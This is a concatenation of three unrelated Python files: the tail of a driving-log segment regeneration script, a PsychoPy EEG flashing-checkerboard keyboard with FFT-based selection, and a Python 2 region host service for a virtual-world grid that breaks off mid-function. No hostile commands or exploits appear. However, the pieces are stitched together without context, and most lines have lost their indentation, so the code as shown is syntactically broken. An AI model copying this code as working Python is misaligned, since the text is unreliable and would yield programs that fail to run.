ignore = list(fake_daemons.keys()) + ['ui', 'manage_athenad', 'uploader']
ensure_running(managed_processes.values(), started=True, not_run=ignore)
for procs in fake_daemons.values():
for p in procs:
p.start()
for _ in tqdm(range(60)):
# ensure all procs are running
for d, procs in fake_daemons.items():
for p in procs:
if not p.is_alive():
raise Exception(f"{d}'s {p.name} died")
time.sleep(1)
finally:
# kill everything
for p in managed_processes.values():
p.stop()
for procs in fake_daemons.values():
for p in procs:
p.terminate()
r = params.get("CurrentRoute", encoding='utf-8')
return os.path.join(outdir, r + "--0")
def regen_and_save(route, sidx, upload=False, use_route_meta=True):
if use_route_meta:
    r = Route(route)
    lr = LogReader(r.log_paths()[sidx])
    fr = FrameReader(r.camera_paths()[sidx])
else:
lr = LogReader(f"cd:/{route.replace('|', '/')}/{sidx}/rlog.bz2")
fr = FrameReader(f"cd:/{route.replace('|', '/')}/{sidx}/fcamera.hevc")
rpath = regen_segment(lr, {'roadCameraState': fr})
relr = os.path.relpath(rpath)
print("\n\n", "*"*30, "\n\n")
print("New route:", relr, "\n")
if upload:
upload_route(relr)
return relr
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Generate new segments from old ones")
parser.add_argument("--upload", action="store_true", help="Upload the new segment to the CI bucket")
parser.add_argument("route", type=str, help="The source route")
parser.add_argument("seg", type=int, help="Segment in source route")
args = parser.parse_args()
regen_and_save(args.route, args.seg, args.upload)
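# Example invocation (route and segment index come from the arguments above):
#   python regen.py "<route-name>" <segment-index> [--upload]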
|
eegInterface.py
|
# eegInterface.py
#
# Creates a keyboard made of flashing checkerboxes which can be
# selected by the user looking at and concentrating on an individual box.
# A baseline is recorded for the first 30 s. The EEG data is compared against
# the baseline data to determine if the user is looking at a certain box.
# Author: Ronan Byrne
# Last Updated: 09/05/2018
#
from psychopy import visual, event
import numpy as np
import scipy.stats as st
import threading
# Interface arguments
window_size = [1200, 700]
checker_cycles = 4 # Number of times texture repeats in box
checker_size = 160
checker_tex = np.array([[1, -1], [-1, 1]]) # One black and one white box
checker_frequency = np.array([10, 20, 15, 5, 12]) # Flashing Frequencies
special_text = 'SPECIAL'
num_text = 'NUM'
text_boxes = [
['A', 'B', 'C', 'D', 'E'],
['F', 'G', 'H', 'I', 'J'],
['K', 'L', 'M', 'N', 'O'],
['P', 'Q', 'R', 'S', 'T'],
['U', 'V', 'W', 'X', 'Y', 'Z', num_text, special_text]
]
num_boxes = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
enter_text = 'ENTER'
del_text = 'DEL'
space_text = 'SPACE'
special_boxes = [space_text, '.', '?', enter_text, del_text]
class BCI(object):
def __init__(self, win_size, freq_array, checker_size, checker_cycles, checker_tex, pipe):
self.pipe = pipe
self.win_size = win_size
self.win = visual.Window(self.win_size,
units='pix',
monitor='testMonitor',
)
self.mouse = event.Mouse(win=self.win)
self.tex = checker_tex
self.checker_size = checker_size
self.checker_cycles = checker_cycles
self.freq_array = freq_array
self.stim = []
self.selection_boxes = []
self.xy = []
self.top_level_boxes = text_boxes
# create checker boxes and text above boxes
# Some magic numbers here for the positions, not fully customisable
for i in range(len(self.top_level_boxes)):
self.xy.append([i * 220 - self.win_size[0] / 2 + self.checker_size,
-self.win_size[1] / 2 + 0.75 * self.checker_size +
(not ((i + 1) % 2)) * (1.5 * self.checker_size)])
self.stim.append(visual.GratingStim(self.win,
tex=self.tex,
size=self.checker_size,
units='pix',
sf=self.checker_cycles / self.checker_size,
pos=self.xy[i]))
self.selection_boxes.append(visual.TextStim(self.win,
text=','.join(self.top_level_boxes[i]),
pos=[self.stim[i].pos[0], self.stim[i].pos[1]
+ 0.60 * self.checker_size]))
self.num_of_stim = len(self.stim)
self.instructions_text1 = 'Recording Baseline, please stare into the center box until it starts flashing'
self.instructions_text2 = 'Stare into the center of the box which corresponds to the character ' \
'you want to choose'
self.instructions_box_update = False
# TextStim is slower than TextBox but TextBox was unreliable
self.instructions_box = visual.TextStim(self.win,
text=self.instructions_text1,
pos=[0, self.win_size[1] / 2 - 50],
alignHoriz='center',
alignVert='center')
# White rectangle for textbox
self.entered_background = visual.Rect(self.win,
units='pix',
width=self.win_size[0]/2,
height=40,
fillColor=[1, 1, 1],
pos=[0, self.instructions_box.pos[1] - 75])
# Textbox text
self.entered_textbox = visual.TextStim(self.win,
text='|',
color=[-1, -1, -1],
pos=[self.entered_background.pos[0], self.entered_background.pos[1]],
alignHoriz='center',
alignVert='center')
# Green box to outline which box was selected
self.selected_box = visual.Rect(self.win,
units='pix',
width=self.checker_size,
height=self.checker_size,
lineWidth=40,
lineColor=[-1, 1, -1],
fillColor=None,
pos=[0, 0] # will be changed when used
)
# Number of frames the green box is shown for
self.selected_box_on_frames = 30
self.selected_box_frames = 0
self.selected_index = -1
# Average Frame rate
self.frame_rate = self.win.getActualFrameRate()
self.frame_interval = 1 / self.frame_rate
# The time interval for each box
self.interval = 1 / self.freq_array
# Number of frames each checker box is shown
self.stim_frames = np.round(self.interval / self.frame_interval)
print("Frame rate is {0}. Actual Flashing Frequency will be {1}".format(self.frame_rate, str(
1 / (self.stim_frames * self.frame_interval))))
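        # Worked example (assuming a 60 Hz display): a 12 Hz target gives
        # stim_frames = round((1/12) / (1/60)) = 5, so the checkerboard is
        # swapped every 5 frames and the realised rate is 60/5 = 12 Hz exactly,
        # while a 13 Hz target also rounds to 5 frames and is shown at 12 Hz.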
self.box_selected = False
# Flag for if we are in the bottom level of the selection tree
self.bottom_level = False
self.baseline_count = 0
self.pipe_thread = threading.Thread(target=self.pipeReceive, daemon=True)
if self.pipe is not None:
self.setting_baseline = True
self.pipe_thread.start()
self.start()
else:
self.setting_baseline = False
def start(self):
self.mouse.clickReset()
self.win.flip()
frame_count = 0
while not event.getKeys('escape'):
            # If 'b' is pressed, record the baseline again
if event.getKeys('b') and self.pipe is not None:
self.setting_baseline = True
self.baseline_count = 0
self.instructions_box.text = self.instructions_text1
self.instructions_box_update = True
self.entered_textbox.text = '|'
# If not recording baseline, check if any boxes were selected or need to be updated
if not self.setting_baseline:
# Check if the left button was clicked and a box is not already selected
if self.mouse.getPressed().count(1) and (self.selected_index == -1):
self.mouse.clickReset()
pos = self.mouse.getPos()
# Check if the mouse was clicked inside one of the boxes
for i in range(self.num_of_stim):
if self.stim[i].contains(pos):
self.selected_index = i
self.selected_box.pos = self.stim[self.selected_index].pos
self.selected_box_frames = self.selected_box_on_frames
self.selected_box.draw()
break
# A Box was selected, redraw
                elif self.selected_index != -1:
self.selected_box.draw()
self.selected_box_frames -= 1
# Last redraw of selection box, update boxes with new selection
if self.selected_box_frames <= 0:
self.update_selection()
# Check if any of the checker boards need to be updated
for i, x in enumerate(self.stim_frames):
if (frame_count % x) == 0:
# Swap checkerboard pattern
self.stim[i].tex = -self.stim[i].tex
# Update all things on screen
self.draw_screen()
            # win.flip() blocks until the screen refresh, so it is used to count the number of frames passed
self.win.flip()
frame_count += 1
# Group choices together
def group_choices(self, boxes):
# Selection boxes can hold 1-4 values each
boxes_len = len(boxes)
if boxes_len / 2 <= self.num_of_stim:
j_max = 2
elif boxes_len / 3 <= self.num_of_stim:
j_max = 3
elif boxes_len / 4 <= self.num_of_stim:
j_max = 4
else:
print("unsupported length, resetting to top level")
self.reset_to_top_level()
return
offset = 0
# Update boxes with new selections
for i in range(0, self.num_of_stim):
self.selection_boxes[i].text = ''
for j in range(j_max):
try:
self.selection_boxes[i].text += (boxes[i + j + offset] + ',')
                except IndexError:
                    # reached the end of the selections; remove ',' from the last box
self.selection_boxes[i].text = self.selection_boxes[i].text[:-1]
break
offset += 1
# remove ',' from end of each box selection
self.selection_boxes[i].text = self.selection_boxes[i].text[:-1]
# Reset the selection to the top level
def reset_to_top_level(self):
self.bottom_level = False
for i, x in enumerate(self.stim):
self.selection_boxes[i].text = ','.join(self.top_level_boxes[i])
self.selection_boxes[i].draw()
# draw everything on screen
def draw_screen(self):
for i, x in enumerate(self.stim):
self.stim[i].draw()
self.selection_boxes[i].draw()
if self.instructions_box_update:
self.instructions_box.text = self.instructions_text2
self.instructions_box_update = False
self.instructions_box.draw()
self.entered_background.draw()
self.entered_textbox.draw()
# Update the screen with new selections
def update_selection(self):
# Not to the lowest level selection
if not self.bottom_level:
            # can't display all elements within the available boxes
if len(self.selection_boxes[self.selected_index].text.split(',')) > self.num_of_stim:
self.group_choices(self.selection_boxes[self.selected_index].text.split(','))
# Non empty selection which can be split into max boxes or less
elif len(self.selection_boxes[self.selected_index].text) > 1:
temp_text = self.selection_boxes[self.selected_index].text.split(',')
self.bottom_level = True
# Place one choice in each box
for i in range(self.num_of_stim):
try:
self.selection_boxes[i].text = temp_text[i]
                    except IndexError:
# No more text to display, rest of boxes will have no text
self.selection_boxes[i].text = ''
self.selection_boxes[i].draw()
# Empty box chosen, reset to top level
elif len(self.selection_boxes[self.selected_index].text) == 0:
print("Empty box chosen, resetting to top level")
self.reset_to_top_level()
else:
print("Unknown state, resetting")
self.reset_to_top_level()
# Bottom level selection
else:
temp_boxes = []
# Non single character selection
if len(self.selection_boxes[self.selected_index].text) > 1:
# Special selection choices
# NUM box was chosen
if self.selection_boxes[self.selected_index].text == num_text:
temp_boxes = num_boxes
if len(temp_boxes) > self.num_of_stim:
self.group_choices(temp_boxes)
self.bottom_level = False
# SPECIAL box was chosen
elif self.selection_boxes[self.selected_index].text == special_text:
temp_boxes = special_boxes
if len(temp_boxes) > self.num_of_stim:
self.group_choices(temp_boxes)
self.bottom_level = False
# ENTER box was chosen
elif self.selection_boxes[self.selected_index].text == enter_text:
self.bottom_level = False
self.entered_textbox.text = '|'
# TODO something on enter
# DEL box was chosen
elif self.selection_boxes[self.selected_index].text == del_text:
self.bottom_level = False
self.entered_textbox.text = self.entered_textbox.text[:-1]
# SPACE was chosen
elif self.selection_boxes[self.selected_index].text == space_text:
self.bottom_level = False
self.entered_textbox.text += ' '
else:
                    print('Unknown case, resetting to top level')
self.bottom_level = False
# Display bottom level selection
if self.bottom_level:
for i in range(self.num_of_stim):
try:
self.selection_boxes[i].text = temp_boxes[i]
                    except IndexError:
self.selection_boxes[i].text = ''
self.selection_boxes[i].draw()
else:
# something was selected and there was no sub-level
# reset selection to top level
if len(temp_boxes) == 0:
self.reset_to_top_level()
# Empty box chosen, reset to top level
elif len(self.selection_boxes[self.selected_index].text) == 0:
print("Empty box chosen, resetting to top level")
self.reset_to_top_level()
# Single character selection
else:
# Remove cursor
                if self.entered_textbox.text == '|':
self.entered_textbox.text = self.selection_boxes[self.selected_index].text
# Append selection
else:
self.entered_textbox.text += self.selection_boxes[self.selected_index].text
self.reset_to_top_level()
self.selected_index = -1
def pipeReceive(self):
# TODO receive initial parameters through pipe
fft_padding = 5 # pad fft with 5 times the length
window_len = 1000 # fft window size
recv_window_len = 1000 # size of data sent through pipe
fs = 1000
cdf_per = 10.0 # 10% probability from cumulative density function
max_baseline_time = 30 # time to get baseline
max_baseline_count = int(max_baseline_time*fs/window_len)
ham = np.hamming(window_len)
# Frequency points from fft
freq_axis = np.fft.rfftfreq(window_len * fft_padding, 1 / fs)
signal_buff = np.zeros(window_len)
freq_array_len = len(self.freq_array)
# Signal magnitude for each fft
freq_sig_snr = np.zeros([freq_array_len, 2])
# SNR of last two fft
freq_sig_mean_snr = np.zeros([freq_array_len, 1])
# Baseline magnitude of each frequencies
freq_sig_base_val = np.zeros([freq_array_len, max_baseline_count])
        # Signal threshold exceeded with 10% or less probability under the baseline
freq_sig_val_thresh = np.zeros([freq_array_len, 1])
# Freq tolerance to check magnitude
freq_tol = 0
while True:
# Read in data from pipe, pipe.recv blocks until data is received
for i in range(int(window_len/recv_window_len)):
signal_buff[i*recv_window_len:i*recv_window_len+recv_window_len] = self.pipe.recv()
y_ham = signal_buff * ham
# Calculate fft assuming signal is real, returns first half of spectrum
rfft = np.fft.rfft(y_ham, window_len * fft_padding)
# Calculate magnitude
rfft_mag = 4 / window_len * np.absolute(rfft)
# loop through each frequency calculating maximum magnitude within the freq tol
for index, f in enumerate(self.freq_array):
freq_start = f - freq_tol
freq_end = f + freq_tol
freq_max = 0
for i in range(0, len(freq_axis)):
if freq_axis[i] >= freq_start:
if rfft_mag[i] > freq_max:
freq_max = rfft_mag[i]
if freq_axis[i] >= freq_end:
if self.setting_baseline:
# Add max value to baseline array for later
freq_sig_base_val[index][self.baseline_count] = freq_max
else:
                                # Only record an SNR value if the magnitude exceeds the threshold
if freq_sig_val_thresh[index] < freq_max:
freq_sig_snr[index][1] = freq_max / freq_sig_val_thresh[index]
else:
freq_sig_snr[index][1] = 0
break
if self.setting_baseline:
self.baseline_count += 1
# Enough baseline values
if self.baseline_count == max_baseline_count:
# Calculate gamma cumulative distribution function for each frequency
for i in range(freq_array_len):
std = np.std(freq_sig_base_val[i])
mean = np.mean(freq_sig_base_val[i])
# create a line from the min magnitude to 1.5 * max magnitude
x = np.linspace(min(freq_sig_base_val[i]), max(freq_sig_base_val[i]) * 1.5, 1000)
# Calculate shape, scale and location of gamma distribution
parameters_l = st.gamma.fit(freq_sig_base_val[i])
# Calculate gamma cdf
fitted_cdf = st.gamma.cdf(x, parameters_l[0], parameters_l[1], parameters_l[2])
                        # Find the first point where the upper-tail probability drops below the cdf percent threshold
for j in range(len(x)):
if (1 - fitted_cdf[j]) < (cdf_per / 100.0):
freq_sig_val_thresh[i] = x[j]
break
# if the cdf percent threshold is outside of range, just use 2 standard deviations
if freq_sig_val_thresh[i] == 0:
freq_sig_val_thresh[i] = mean+2*std
print("freq {} mean {}, std {}, thresh {}".format(self.freq_array[i], mean, std,
freq_sig_val_thresh[i]))
freq_sig_snr[i][0] = freq_sig_base_val[i][-1]/freq_sig_val_thresh[i]
self.baseline_count = 0
self.setting_baseline = False
# Have to set a flag here instead of updating because setting the text in
# another thread causes problems
self.instructions_box_update = True
else:
print("freq sig val{}".format(freq_sig_snr.tolist()))
# Loop through frequencies to calculate mean snr
for i in range(freq_array_len):
# If the last two fft snr are not zero, it may be from the stimulus
if freq_sig_snr[i][0] > 0 and freq_sig_snr[i][1] > 0:
freq_sig_mean_snr[i] = np.mean(freq_sig_snr[i])
else:
freq_sig_mean_snr[i] = 0
# shift snr value back
freq_sig_snr[i][0] = freq_sig_snr[i][1]
# Find index of max snr
max_sig_val_index = np.argmax(freq_sig_mean_snr)
# if all snr's are zero, it will return the first in the array
if freq_sig_mean_snr[max_sig_val_index] > 0:
print("max freq snr {}".format(self.freq_array[max_sig_val_index]))
# draw a green box around selected box
self.selected_index = max_sig_val_index
self.selected_box.pos = self.stim[self.selected_index].pos
self.selected_box_frames = self.selected_box_on_frames
self.selected_box.draw()
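# --- Hedged sketch (added for illustration; not part of the original interface) ---
# Shows, in isolation, how the baseline threshold used in pipeReceive above is
# derived: fit a gamma distribution to the baseline magnitudes and take the
# smallest magnitude whose upper-tail probability drops below cdf_per percent.
def _gamma_threshold_sketch(baseline_vals, cdf_per=10.0):
    """Return the magnitude where P(X > x) first falls below cdf_per percent."""
    x = np.linspace(min(baseline_vals), max(baseline_vals) * 1.5, 1000)
    shape, loc, scale = st.gamma.fit(baseline_vals)
    fitted_cdf = st.gamma.cdf(x, shape, loc, scale)
    for xi, ci in zip(x, fitted_cdf):
        if (1 - ci) < (cdf_per / 100.0):
            return xi
    # Fall back to mean + 2 standard deviations, as the main loop does
    return np.mean(baseline_vals) + 2 * np.std(baseline_vals)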
if __name__ == '__main__':
bci = BCI(win_size=window_size,
freq_array=checker_frequency, checker_cycles=checker_cycles, checker_size=checker_size,
checker_tex=checker_tex, pipe=None)
bci.start()
|
RegionHost.py
|
'''
Created on Jan 24, 2013
@author: mdickson
'''
import sys
import errno
import time
import os.path
import threading
import shlex
import subprocess
import psutil
import Queue
import inworldz.util.provision as provision
import inworldz.util.properties as DefaultProperties
from inworldz.util.filesystem import ConnectUNCShare
from inworldz.util.rdbhost import GetRdbHost, AssignBestRdbHost
import inworldz.maestro.uuid as genuuid
import inworldz.maestro.MaestroStore as store
from inworldz.maestro.ServiceBase import ServiceBase
from inworldz.maestro.MaestroError import ServiceError
from inworldz.maestro.System import Cpu, Disk, Memory, Process
from inworldz.maestro.Region import Region
from inworldz.maestro.GridServices import UserService, MessagingService, ApertureService,\
GridService
import inworldz.maestro.environment.ComputeResource as ComputeResource
from inworldz.maestro.environment.RegionEntry import RegionState, RegionEntry
from inworldz.maestro import User
class RegionHost(ServiceBase):
"""Region Host Server"""
@classmethod
def instance(cls):
global inst
try:
inst
        except NameError:
hostid = RegionHost.create({})
inst = store.get(hostid, RegionHost.getClass())
inst.start()
return inst
@classmethod
def getClass(cls):
return "RegionHost"
@classmethod
def getMethods(cls):
methods = [
"IsSlotProvisioned",
"IsSlotFree",
"GetSlotDirectory",
"GetSlotConfiguration",
"ProvisionRegion",
"Shutdown",
"UpdateRegionToRevision",
"UpdateRegionToLatest",
"UpdateGridServicesToRevision",
"UpdateGridServicesToLatest",
"ReconfigureRegion",
"ReconfigureGridServices",
"RunCommand",
"RunCommandAs"
]
return ServiceBase.getMethods() + methods
@classmethod
def getAttrRO(cls):
attrs = [
"Regions",
"Memory",
"Disk",
"Cpu",
"Process",
"UserService",
"MessagingService",
"ApertureService",
"GridService",
"service_base_dir",
"slot_base_dir",
"max_slots",
"Flags"
]
return ServiceBase.getAttrRO() + attrs
@classmethod
def getAttrRW(cls):
attrs = [
"maintenance_mode",
]
return ServiceBase.getAttrRW() + attrs
@classmethod
def getFuncs(cls):
funcs = [
"GetAvailableReleases"
]
return ServiceBase.getFuncs() + funcs
def __init__(self, uuid, record={}):
ServiceBase.__init__(self, uuid, record)
self.props = DefaultProperties.instance()
self.set_maintenance_mode(record.get('maintenance_mode'))
self.host_memory = Memory(genuuid.createString())
self.host_disk = Disk(genuuid.createString())
self.host_cpu = Cpu(genuuid.createString())
self.process = Process(genuuid.createString())
self.maxRegionSlots = provision.GetMaxRegionSlots()
self.slotBaseDir = provision.GetSlotBaseDir()
self.serviceBaseDir = provision.GetServiceBaseDir()
self.regions = []
self.regions_lock = threading.RLock()
@classmethod
def create(cls, record):
uuid = genuuid.createString()
return (cls.recreate(record, uuid))
@classmethod
def recreate(cls, record, uuid):
service = RegionHost(uuid, record)
return (service.get_uuid())
@classmethod
def GetAvailableReleases(cls):
try:
props = DefaultProperties.instance()
gridshare_path = props.getValue("gridshare_path")
(username, password) = props.getGridShareCredentials()
ConnectUNCShare(gridshare_path, username, password)
return (provision.GetRevisions(gridshare_path))
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
raise ServiceError(exc_value)
def start(self):
# Initialize grid services
self.user_service_id = UserService.create({})
self.user_service = store.get(self.user_service_id, "UserService")
self.messaging_service_id = MessagingService.create({})
self.messaging_service = store.get(self.messaging_service_id, "MessagingService")
self.aperture_service_id = ApertureService.create({})
self.aperture_service = store.get(self.aperture_service_id, "ApertureService")
#if we should be hosting a grid service, fire that up too
if self.props.hostingResource.flags & ComputeResource.Flags.GridServiceHost == ComputeResource.Flags.GridServiceHost:
self.grid_service_id = GridService.create({})
self.grid_service = store.get(self.grid_service_id, "GridService")
else:
self.grid_service = None
# Initialize regions
for slot in range(self.maxRegionSlots):
if not provision.IsSlotProvisioned(slot):
continue
regionInfo = provision.GetSlotConfiguration(slot)
for region_uuid in regionInfo.keys():
record = regionInfo[region_uuid]
record['slot_number'] = slot
record['master_avatar_uuid'] = User.User.FindByName(record["master_avatar_first"],
record["master_avatar_last"])
try:
region = Region.recreate(record, region_uuid)
self.region_add(region)
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
pass
self.work_queue = Queue.Queue()
self.queue_runner = threading.Thread(target=self._processQueue, name="QueueRunner")
self.queue_runner.start()
        self.poll_interval = 10.0
self.monitor = threading.Thread(target=self._regionMonitor, name="RegionMonitor")
self.monitor.start()
def _processQueue(self):
print "QueueRunner Starting"
while True:
try:
objid = self.work_queue.get()
service = None
for classname in ["ApertureService", "UserService", "MessagingService", "GridService", "Region"]:
service = store.get(objid, classname)
if (service != None):
break
if service:
if service.ShouldBeRunning():
service.Start()
time.sleep(2) #prevents mono addins problems when services rapid-fire start
else:
print "QueueRunner: Unknown object type queued for service"
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
pass
finally:
self.work_queue.task_done()
def _regionMonitor(self):
print "RegionMonitor Starting"
while True:
try:
if (self.maintenance_mode == True):
continue
if (self.aperture_service.IsRunning() == False and self.aperture_service.ShouldBeRunning()):
self.work_queue.put(self.aperture_service_id)
if (self.user_service.IsRunning() == False and self.user_service.ShouldBeRunning()):
self.work_queue.put_nowait(self.user_service_id)
if (self.grid_service != None and self.grid_service.IsRunning() == False and self.grid_service.ShouldBeRunning()):
self.work_queue.put_nowait(self.grid_service_id)
if (self.messaging_service.IsRunning() == False and self.messaging_service.ShouldBeRunning()):
self.work_queue.put_nowait(self.messaging_service_id)
with self.regions_lock:
for region_uuid in self.regions:
region = store.get(region_uuid, "Region")
regionEntry = self.props.hostingResource.findHostedRegionByUUID(region_uuid)
if region == None or regionEntry == None:
continue
if regionEntry.state != RegionState.DeployedRunning:
continue
if (region.IsRunning() == False):
self.work_queue.put(region_uuid)
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
pass
finally:
time.sleep(self.poll_interval)
def Shutdown(self):
pass
def get_maintenance_mode(self):
return self.maintenance_mode
def set_maintenance_mode(self, mode):
self.maintenance_mode = bool(mode if mode != None else False)
return self.maintenance_mode
def region_add(self, region):
with self.regions_lock:
self.regions.append(region)
def region_del(self, region):
with self.regions_lock:
self.regions.remove(region)
def get_Memory(self):
return self.host_memory.get_uuid()
def get_Disk(self):
return self.host_disk.get_uuid()
def get_Cpu(self):
return self.host_cpu.get_uuid()
def get_Process(self):
return self.process.get_uuid()
def get_Regions(self):
with self.regions_lock:
return self.regions
def get_UserService(self):
return self.user_service_id
def get_MessagingService(self):
return self.messaging_service_id
def get_ApertureService(self):
return self.aperture_service_id
def get_GridService(self):
return self.grid_service_id
def get_service_base_dir(self):
return self.serviceBaseDir
def get_slot_base_dir(self):
return self.slotBaseDir
def get_max_slots(self):
return self.maxRegionSlots
def get_Flags(self):
        return self.props.hostingResource.flags
def IsSlotProvisioned(self, slotnum):
return (provision.IsSlotProvisioned(slotnum))
def IsSlotFree(self, slotnum):
return (provision.IsSlotFree(slotnum))
def GetSlotDirectory(self, slotnum):
return (provision.GetSlotDirectory(slotnum))
def GetSlotConfiguration(self, slotnum):
return (provision.GetSlotConfiguration(slotnum))
def ProvisionRegion(self, record):
""" Set up a new region in the resource pool provided by this host
sim_name - The name of the new region to provision
sim_location_x - The x location on the map for the new region
sim_location_y - The y location on the map for the new region
master_avatar_uuid - The user that owns this new region
"""
for slotnum in range(self.maxRegionSlots):
if (self.IsSlotFree(slotnum)):
record['slot_number'] = slotnum
try:
region = Region.create(record)
#also record this provisioning to the environment
regEntry = RegionEntry(region.sim_uuid, region.sim_name, region.master_avatar_uuid, \
region.estate_id, region.get_region_product(), \
region.sim_location_x, region.sim_location_y, \
self.props.hostingResource.dbid, \
RegionState.SetupInProgress)
self.props.hostingResource.registerNewRegion(regEntry)
region.associateWithRegionEntry()
self.region_add(region.get_uuid())
return region.get_uuid()
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
raise ServiceError(exc_value)
""" No slots found available. tell them """
raise ServiceError("No region slot is available")
def UpdateRegionToRevision(self, region_uuid, revision):
""" Update the region to the revision specified. """
region = store.get(region_uuid, Region.getClass())
if (region == None):
raise ServiceError("Invalid Region Specified")
if (region.IsRunning()):
raise ServiceError("Cannot update a running region.")
try:
target = region.get_slot_directory()
gridshare_path = self.props.getValue("gridshare_path")
(username, password) = self.props.getGridShareCredentials()
ConnectUNCShare(gridshare_path, username, password)
return (provision.ProvisionFromRevision(gridshare_path, target, revision))
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
raise ServiceError(exc_value)
def UpdateRegionToLatest(self, region_uuid):
""" Update the region to the latest revision. """
region = store.get(region_uuid, Region.getClass())
if (region == None):
raise ServiceError("Invalid Region Specified")
if (region.IsRunning()):
raise ServiceError("Cannot update a running region.")
try:
target = region.get_slot_directory()
gridshare_path = self.props.getValue("gridshare_path")
(username, password) = self.props.getGridShareCredentials()
ConnectUNCShare(gridshare_path, username, password)
return (provision.ProvisionFromLatest(gridshare_path, target))
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
raise ServiceError(exc_value)
def UpdateGridServicesToRevision(self, revision):
""" Update the target to the revision specified. """
if (self.aperture_service.IsRunning()):
raise ServiceError("Update: Cannot update, aperture is running.")
if (self.messaging_service.IsRunning()):
raise ServiceError("Update: Cannot update, messaging service is running.")
if (self.user_service.IsRunning()):
raise ServiceError("Update: Cannot update, user service is running.")
try:
target = provision.GetServiceBaseDir()
gridshare_path = self.props.getValue("gridshare_path")
(username, password) = self.props.getGridShareCredentials()
ConnectUNCShare(gridshare_path, username, password)
return (provision.ProvisionFromRevision(gridshare_path, target, revision))
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
raise ServiceError(exc_value)
def UpdateGridServicesToLatest(self):
""" Update the grid services to the latest revision. """
if (self.aperture_service.IsRunning()):
raise ServiceError("Update: Cannot update, aperture is running.")
if (self.messaging_service.IsRunning()):
raise ServiceError("Update: Cannot update, messaging service is running.")
if (self.user_service.IsRunning()):
raise ServiceError("Update: Cannot update, user service is running.")
try:
target = provision.GetServiceBaseDir()
gridshare_path = self.props.getValue("gridshare_path")
(username, password) = self.props.getGridShareCredentials()
ConnectUNCShare(gridshare_path, username, password)
return (provision.ProvisionFromLatest(gridshare_path, target))
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
raise ServiceError(exc_value)
def ReconfigureRegion(self, region_uuid):
""" Retrieves the most up to date configuration templates, and regenerates
configuration files. The region must be down for this to succeed. """
region = store.get(region_uuid, Region.getClass())
if (region == None):
raise ServiceError("Invalid Region Specified")
if (region.IsRunning()):
raise ServiceError("Cannot reconfigure a running region.")
region_record = region.get_record()
slotnum = region.get_slot_number()
regionBaseDir = os.path.join(region.get_slot_directory(), "bin")
regionConfigDir = os.path.join(region.get_slot_directory(), "bin", "Regions")
try:
os.makedirs(regionConfigDir)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(regionConfigDir):
pass
else:
raise ServiceError("Region destination directory doesn't exist")
dbconfig = self.props.getCoreDbConfig()
region_uuid = region.get_sim_uuid()
rdbHost = GetRdbHost(dbconfig, region_uuid)
if (rdbHost == None):
# no info? that's ok in this case we assign
print "RDB server not assigned for {0}, assigning new slot".format(region_uuid)
rdbHost = AssignBestRdbHost(dbconfig, region_uuid)
if ((not 'http_listener_port' in region_record) or (region_record['http_listener_port'] == "{REQUIRE}")):
region_record['http_listener_port'] = str(self.props.getInteger('starting_http_port') + slotnum)
if ((not 'internal_ip_port' in region_record) or (region_record['internal_ip_port'] == "{REQUIRE}")):
region_record['internal_ip_port'] = str(self.props.getInteger('starting_udp_port') + slotnum)
if ((not 'rdb_host' in region_record) or (region_record['rdb_host'] == "{REQUIRE}")):
region_record['rdb_host'] = rdbHost
# Check for REQUIRE items and do the replacements if needed
keys = dict(self.props.getItems(vars=region_record))
# Map the source drive and figure out if its on GridShare
regionConfigName = region.get_name_label() + ".xml"
(username, password) = self.props.getGridShareCredentials()
templateBaseDir = self.props.getValue("template_basedir")
try:
ConnectUNCShare(templateBaseDir, username, password)
""" Read in Region Config Settings """
keys = provision.GetConfiguration(templateBaseDir, "simulation.config", "simulation", keys)
""" Update the Region Configuration First """
provision.ReconfigureRegion(templateBaseDir, regionConfigDir, regionConfigName, keys)
""" Now do the Simulator Configuration Files """
provision.ReconfigureSimulator(templateBaseDir, regionBaseDir, keys)
""" Done"""
return True
except Exception, e:
raise ServiceError("Reconfiguration failed: " + str(e))
def ReconfigureGridServices(self):
""" Retrieves the most up to date configuration templates, and regenerates
configuration files. The grid services must be down for this to succeed. """
if (self.aperture_service.IsRunning()):
raise ServiceError("Reconfigure: Cannot reconfigure, aperture is running.")
if (self.messaging_service.IsRunning()):
raise ServiceError("Reconfigure: Cannot reconfigure, messaging service is running.")
if (self.user_service.IsRunning()):
raise ServiceError("Reconfigure: Cannot reconfigure, user service is running.")
if (self.grid_service != None and self.grid_service.IsRunning()):
raise ServiceError("Reconfigure: Cannot reconfigure, grid service is running.")
serviceBaseDir = os.path.join(provision.GetServiceBaseDir(), "bin")
try:
os.makedirs(serviceBaseDir)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(serviceBaseDir):
pass
else:
raise ServiceError("Grid Services destination directory doesn't exist")
defaults = {}
defaults['http_listener_port'] = str(self.props.getInteger('starting_http_port'))
defaults['internal_ip_port'] = str(self.props.getInteger('starting_udp_port'))
keys = dict(self.props.getItems(vars=defaults))
# Map the source drive and figure out if its on GridShare
(username, password) = self.props.getGridShareCredentials()
templateBaseDir = self.props.getValue("template_basedir")
try:
ConnectUNCShare(templateBaseDir, username, password)
""" Read in Region Config Settings """
keys = provision.GetConfiguration(templateBaseDir, "simulation.config", "simulation", keys)
provision.ReconfigureSimulator(templateBaseDir, serviceBaseDir, keys)
""" Done"""
return True
except Exception:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
